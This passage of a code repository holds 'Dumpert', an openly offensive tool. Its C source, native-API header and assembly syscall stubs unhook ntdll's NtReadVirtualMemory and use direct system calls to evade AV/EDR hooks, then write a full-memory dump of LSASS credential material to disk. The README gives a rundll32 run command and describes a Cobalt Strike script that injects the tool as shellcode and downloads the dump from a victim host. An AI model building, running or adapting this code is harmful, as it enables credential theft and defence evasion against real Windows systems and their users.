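	swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
	pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;

	// Now create os/build specific syscall function pointers. SystemCall is the
	// number of NtReadVirtualMemory for this OS family; Unhook_NativeAPI writes it
	// into the ntdll stub.
	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
		lpOSVersion = L"10 or Server 2016";
		ZwOpenProcess = &ZwOpenProcess10;
		NtCreateFile = &NtCreateFile10;
		ZwClose = &ZwClose10;
		pWinVerInfo->SystemCall = 0x3F;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
		lpOSVersion = L"7 SP1 or Server 2008 R2";
		ZwOpenProcess = &ZwOpenProcess7SP1;
		NtCreateFile = &NtCreateFile7SP1;
		ZwClose = &ZwClose7SP1;
		pWinVerInfo->SystemCall = 0x3C;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
		lpOSVersion = L"8 or Server 2012";
		ZwOpenProcess = &ZwOpenProcess80;
		NtCreateFile = &NtCreateFile80;
		ZwClose = &ZwClose80;
		pWinVerInfo->SystemCall = 0x3D;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
		lpOSVersion = L"8.1 or Server 2012 R2";
		ZwOpenProcess = &ZwOpenProcess81;
		NtCreateFile = &NtCreateFile81;
		ZwClose = &ZwClose81;
		pWinVerInfo->SystemCall = 0x3E;
	}
	else {
		wprintf(L" [!] OS Version not supported.\n\n");
		exit(1);
	}
	wprintf(L" [+] Operating System is Windows %ls, build number %u\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
	wprintf(L" [+] Mapping version specific System calls.\n");

	wprintf(L"[2] Checking Process details:\n");

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		wprintf(L" [!] RtlInitUnicodeString not found in ntdll.dll.\n");
		exit(1);
	}

	RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName);

	if (!GetPID(pWinVerInfo)) {
		wprintf(L" [!] Enumerating process failed.\n");
		exit(1);
	}

	// %wZ takes a pointer to a UNICODE_STRING (the original passed the struct by value).
	wprintf(L" [+] Process ID of %wZ is: %llu\n", &pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID);

	// Presumably this export is patched because dbghelp reads the target through it
	// and a user-mode hook there would see every read of lsass memory.
	pWinVerInfo->lpApiCall = "NtReadVirtualMemory";

	if (!Unhook_NativeAPI(pWinVerInfo)) {
		printf(" [!] Unhooking %s failed.\n", pWinVerInfo->lpApiCall);
		exit(1);
	}

	wprintf(L"[3] Create memorydump file:\n");

	wprintf(L" [+] Open a process handle.\n");
	HANDLE hProcess = NULL;
	OBJECT_ATTRIBUTES ObjectAttributes;
	InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
	CLIENT_ID uPid = { 0 };

	uPid.UniqueProcess = pWinVerInfo->hTargetPID;
	uPid.UniqueThread = (HANDLE)0;

	// NOTE(review): PROCESS_ALL_ACCESS is broader than a read-only minidump needs;
	// MiniDumpWriteDump's documented minimum is PROCESS_QUERY_INFORMATION |
	// PROCESS_VM_READ. Kept as-is here -- confirm before narrowing.
	NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
	if (status != STATUS_SUCCESS || hProcess == NULL) {
		wprintf(L" [!] Failed to get processhandle.\n");
		exit(1);
	}

	// NtCreateFile needs an NT object path, hence the "\??\" prefix in front of
	// the Win32 path "<windir>\Temp\dumpert.dmp".
	WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
	WCHAR chWinPath[MAX_PATH];
	if (GetWindowsDirectory(chWinPath, MAX_PATH) == 0) {
		wprintf(L" [!] GetWindowsDirectory failed.\n");
		ZwClose(hProcess);
		exit(1);
	}
	wcscat_s(chDmpFile, _countof(chDmpFile), chWinPath);
	wcscat_s(chDmpFile, _countof(chDmpFile), L"\\Temp\\dumpert.dmp");

	UNICODE_STRING uFileName;
	RtlInitUnicodeString(&uFileName, chDmpFile);

	wprintf(L" [+] Dump %wZ memory to: %wZ\n", &pWinVerInfo->ProcName, &uFileName);

	HANDLE hDmpFile = NULL;
	IO_STATUS_BLOCK IoStatusBlock;
	ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
	OBJECT_ATTRIBUTES FileObjectAttributes;
	InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);

	// Open the output file for writing, overwriting an existing one. Failure is
	// reported through the NTSTATUS; a native call is not guaranteed to set
	// *FileHandle at all on failure, so the original INVALID_HANDLE_VALUE test
	// could never fire and the tool went on to dump into a NULL handle.
	status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
		FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);

	if (status != STATUS_SUCCESS || hDmpFile == NULL) {
		wprintf(L" [!] Failed to create dumpfile.\n");
		ZwClose(hProcess);
		exit(1);
	}

	DWORD dwTargetPID = GetProcessId(hProcess);
	BOOL Success = MiniDumpWriteDump(hProcess,
		dwTargetPID,
		hDmpFile,
		MiniDumpWithFullMemory,
		NULL,
		NULL,
		NULL);
	if (!Success)
	{
		// On failure a truncated dumpert.dmp is left behind at the path printed above.
		wprintf(L" [!] Failed to create minidump, error code: %x\n", GetLastError());
	}
	else {
		wprintf(L" [+] Dump succesful.\n");
	}

	ZwClose(hDmpFile);
	ZwClose(hProcess);
	free(pWinVerInfo);

	return Success ? 0 : 1;
}
-------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Dumpert.h: --------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | #include 
4 | 
5 | #define STATUS_SUCCESS 0
6 | #define OBJ_CASE_INSENSITIVE 0x00000040L
7 | #define FILE_OVERWRITE_IF 0x00000005
8 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
9 | typedef LONG KPRIORITY;
10 | 
11 | #define InitializeObjectAttributes( i, o, a, r, s ) { \
12 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \
13 | (i)->RootDirectory = r; \
14 | (i)->Attributes = a; \
15 | (i)->ObjectName = o; \
16 | (i)->SecurityDescriptor = s; \
17 | (i)->SecurityQualityOfService = NULL; \
18 | }
19 | 
20 | typedef struct _UNICODE_STRING {
21 | USHORT Length;
22 | USHORT MaximumLength;
23 | PWSTR Buffer;
24 | } UNICODE_STRING, *PUNICODE_STRING;
25 | 
26 | typedef const UNICODE_STRING* PCUNICODE_STRING;
27 | 
28 | typedef struct _WIN_VER_INFO {
29 | WCHAR chOSMajorMinor[8];
30 | DWORD dwBuildNumber;
31 | UNICODE_STRING ProcName;
32 | HANDLE hTargetPID;
33 | LPCSTR lpApiCall;
34 | INT SystemCall;
35 | } WIN_VER_INFO, *PWIN_VER_INFO;
36 | 
37 | typedef struct _OBJECT_ATTRIBUTES {
38 | ULONG Length;
39 | HANDLE RootDirectory;
40 | PUNICODE_STRING ObjectName;
41 | ULONG Attributes;
42 | PVOID SecurityDescriptor;
43 | PVOID SecurityQualityOfService;
44 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
45 | 
46 | 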
typedef struct _CLIENT_ID { 47 | HANDLE UniqueProcess; 48 | HANDLE UniqueThread; 49 | } CLIENT_ID, *PCLIENT_ID; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation, 53 | SystemProcessorInformation, 54 | SystemPerformanceInformation, 55 | SystemTimeOfDayInformation, 56 | SystemPathInformation, 57 | SystemProcessInformation, 58 | SystemCallCountInformation, 59 | SystemDeviceInformation, 60 | SystemProcessorPerformanceInformation, 61 | SystemFlagsInformation, 62 | SystemCallTimeInformation, 63 | SystemModuleInformation 64 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 65 | 66 | typedef struct _SYSTEM_PROCESSES { 67 | ULONG NextEntryDelta; 68 | ULONG ThreadCount; 69 | ULONG Reserved1[6]; 70 | LARGE_INTEGER CreateTime; 71 | LARGE_INTEGER UserTime; 72 | LARGE_INTEGER KernelTime; 73 | UNICODE_STRING ProcessName; 74 | KPRIORITY BasePriority; 75 | HANDLE ProcessId; 76 | HANDLE InheritedFromProcessId; 77 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 78 | 79 | typedef struct _IO_STATUS_BLOCK 80 | { 81 | union 82 | { 83 | LONG Status; 84 | PVOID Pointer; 85 | }; 86 | ULONG Information; 87 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 88 | 89 | 90 | // Windows 7 SP1 / Server 2008 R2 specific Syscalls 91 | EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 92 | EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 93 | EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 94 | EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle); 95 | EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 96 | EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* 
BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 97 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 98 | EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 99 | 100 | // Windows 8 / Server 2012 specific Syscalls 101 | EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 102 | EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 103 | EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 104 | EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle); 105 | EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 106 | EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 107 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 108 | EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG 
EaLength); 109 | 110 | 111 | // Windows 8.1 / Server 2012 R2 specific Syscalls 112 | EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 113 | EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 114 | EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 115 | EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle); 116 | EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 117 | EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 118 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 119 | EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 120 | 121 | 122 | // Windows 10 / Server 2016 specific Syscalls 123 | EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 124 | EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 125 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 126 | EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle); 
127 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 128 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 129 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 130 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 131 | 132 | NTSTATUS(*NtAllocateVirtualMemory)( 133 | HANDLE ProcessHandle, 134 | PVOID *BaseAddress, 135 | ULONG_PTR ZeroBits, 136 | PSIZE_T RegionSize, 137 | ULONG AllocationType, 138 | ULONG Protect 139 | ); 140 | 141 | NTSTATUS(*NtFreeVirtualMemory)( 142 | HANDLE ProcessHandle, 143 | PVOID *BaseAddress, 144 | IN OUT PSIZE_T RegionSize, 145 | ULONG FreeType 146 | ); 147 | 148 | NTSTATUS(*ZwOpenProcess)( 149 | PHANDLE ProcessHandle, 150 | ACCESS_MASK DesiredAccess, 151 | POBJECT_ATTRIBUTES ObjectAttributes, 152 | PCLIENT_ID ClientId 153 | ); 154 | 155 | NTSTATUS(WINAPI *ZwQuerySystemInformation)( 156 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 157 | PVOID SystemInformation, 158 | ULONG SystemInformationLength, 159 | PULONG ReturnLength 160 | ); 161 | 162 | NTSTATUS(*ZwWriteVirtualMemory)( 163 | HANDLE hProcess, 164 | PVOID lpBaseAddress, 165 | PVOID lpBuffer, 166 | SIZE_T NumberOfBytesToRead, 167 | PSIZE_T NumberOfBytesRead 168 | ); 169 | 170 | NTSTATUS(*ZwProtectVirtualMemory)( 171 | IN HANDLE ProcessHandle, 172 | IN PVOID* BaseAddress, 173 | IN SIZE_T* NumberOfBytesToProtect, 174 | IN ULONG NewAccessProtection, 175 | OUT PULONG 
OldAccessProtection 176 | ); 177 | 178 | NTSTATUS(*NtCreateFile)( 179 | PHANDLE FileHandle, 180 | ACCESS_MASK DesiredAccess, 181 | POBJECT_ATTRIBUTES ObjectAttributes, 182 | PIO_STATUS_BLOCK IoStatusBlock, 183 | PLARGE_INTEGER AllocationSize, 184 | ULONG FileAttributes, 185 | ULONG ShareAccess, 186 | ULONG CreateDisposition, 187 | ULONG CreateOptions, 188 | PVOID EaBuffer, 189 | ULONG EaLength 190 | ); 191 | 192 | NTSTATUS(*ZwClose)( 193 | IN HANDLE KeyHandle 194 | ); 195 | 196 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 197 | LPOSVERSIONINFOEXW lpVersionInformation 198 | ); 199 | 200 | typedef void (WINAPI* _RtlInitUnicodeString)( 201 | PUNICODE_STRING DestinationString, 202 | PCWSTR SourceString 203 | ); 204 | 205 | typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 206 | PUNICODE_STRING String1, 207 | PCUNICODE_STRING String2, 208 | BOOLEAN CaseInSensitive 209 | ); 210 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} 23 | OutflankDumpert 24 | 8.1 25 | Outflank-Dumpert 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | Disabled 78 | true 79 | 80 | 81 | 82 | 83 | Level3 84 | Disabled 85 | true 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | 
MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | false 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 
36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | 
ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Dumpert, an LSASS 
memory dumper using direct system calls and API unhooking
2 | 
3 | Recent malware research shows an increase in malware that uses direct system calls to evade the user-mode API hooks placed by security products.
4 | This tool demonstrates direct system calls and API unhooking and combines these techniques in proof-of-concept code that creates an LSASS memory dump from Cobalt Strike,
5 | without the injected code touching disk and without passing through the user-mode API calls that AV/EDR products monitor. Note that the minidump itself is written to disk: a full-memory dump of LSASS (i.e. credential material) is created at `%WINDIR%\Temp\dumpert.dmp` and is not removed by the tool or by the Aggressor script, so delete it from the host once it has been downloaded.
6 | 
7 | More info about the techniques used can be found in the following blog post:
8 | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
9 | 
10 | Two versions of the code are included:
11 | 
12 | An executable and a DLL version of the code. Both are x64 only and support Windows 7 SP1 / Server 2008 R2, 8 / Server 2012, 8.1 / Server 2012 R2 and 10 / Server 2016; the system call numbers are hard-coded per version in Syscalls.asm, so any other version is rejected at startup.
13 | The DLL version can be run as follows (the exported entry point is `Dump`):
14 | 
15 | ```
16 | rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
17 | ```
18 | 
19 | Also, an sRDI version of the code is provided, including a Cobalt Strike Aggressor script.
20 | This script uses shinject to inject the sRDI shellcode version of the Dumpert DLL into the current Beacon process.
21 | Then it waits a few seconds for the lsass minidump to finish and finally downloads the minidump file from the victim host. The wait is a fixed delay, so on a host with a large LSASS the dump may not be complete when the download starts; the script does not delete the file afterwards.
22 | 
23 | Compile instructions:
24 | 
25 | ```
26 | This project is written in C and assembly.
27 | You can use Visual Studio to compile it from source.
28 | ```
29 | 
30 | The sRDI code can be found here: https://github.com/monoxgas/sRDI
31 | --------------------------------------------------------------------------------